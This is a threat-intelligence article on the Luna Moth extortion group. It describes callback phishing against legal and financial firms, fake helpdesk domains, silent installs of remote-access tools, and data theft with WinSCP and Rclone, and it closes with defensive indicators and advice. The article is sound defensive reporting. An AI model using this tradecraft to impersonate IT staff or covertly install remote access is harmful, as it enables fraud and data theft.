Luna Moth’s Data Extortion Playbook with Callback Phishing, RMM, and Exfiltration Tools

An ongoing campaign by the financially motivated threat actor Luna Moth (also known as Silent Ransom Group, UNC3753, and Storm-0252) has been identified by EclecticIQ, tracking this campaign from April 2024 through April 2025. This group primarily targets U.S.-based legal and financial organizations through callback phishing campaigns. Their strategy involves sending phishing emails that prompt recipients to call fake helpdesk numbers, leading to social engineering attacks that result in the installation of remote monitoring and management (RMM) tools. EclecticIQ's assessment is made with "high confidence that Luna Moth is very likely linked to actors behind the 2021 BazarCall campaign, known for deploying Conti and Ryuk ransomware." Luna Moth focuses on data theft and extortion, demanding seven-figure ransoms without encrypting files. This shift is "likely a strategic move by former Conti-linked actors to reduce operational risk and sustain revenue following Conti’s 2022 dismantling." The group has registered at least 37 domains through GoDaddy, often using typosquatted patterns like [company_name]-helpdesk[.]com, and leverages platforms such as Reamaze to embed AI-powered chatbots into phishing pages, enhancing their social engineering tactics.

In the campaign observed between April 2024 and April 2025, Luna Moth primarily targeted the legal sector, accounting for 40.28% of observed victims. Other affected sectors include financial services (23.61%), accounting (13.89%), business services (6.94%), real estate (4.17%), technology (2.79%), and additional verticals such as energy, gambling, architecture, media, consulting, and retail. Geographically, the United States remains the primary focus with 64 confirmed victim organizations, followed by Canada (3), France (1), and Germany (1). The group's deliberate focus on "high-trust service sectors," especially legal, financial, and insurance firms, where sensitive data is prevalent and compliance obligations are strict, amplifies the pressure to pay and the overall impact of its extortion campaigns.

Luna Moth's attack chain begins with phishing emails that lure victims into calling fraudulent helpdesk numbers. Once connected, attackers impersonate IT support personnel, creating a sense of urgency to convince victims to install legitimate RMM tools such as AnyDesk, Atera, Splashtop, Syncro, SuperOps, and Zoho Assist. These tools are often installed in unusual directories and executed with command-line flags such as "/silent", "/quiet", "/no-gui", or "/hidden" to evade detection. After establishing remote access, the attackers perform data exfiltration using tools like WinSCP and Rclone, transferring stolen data to actor-controlled servers or cloud storage services. This method of attack avoids the use of traditional malware to maintain a lower footprint and reduce the chance of detection.

Luna Moth's tactics present challenges for detection and prevention. Their use of legitimate RMM tools and avoidance of traditional malware allows them to bypass standard security measures. Indicators of compromise include the use of RMM tools with unusual execution parameters, data exfiltration via WinSCP or Rclone, and the presence of typosquatted domains mimicking legitimate organizations. Organizations are advised to implement strict controls over the installation and use of RMM tools, monitor for unusual data transfer activities, and educate employees about the risks of social engineering attacks. Leveraging threat intelligence to block known Luna Moth infrastructure and regularly reviewing security policies can further mitigate the risk posed by this threat actor.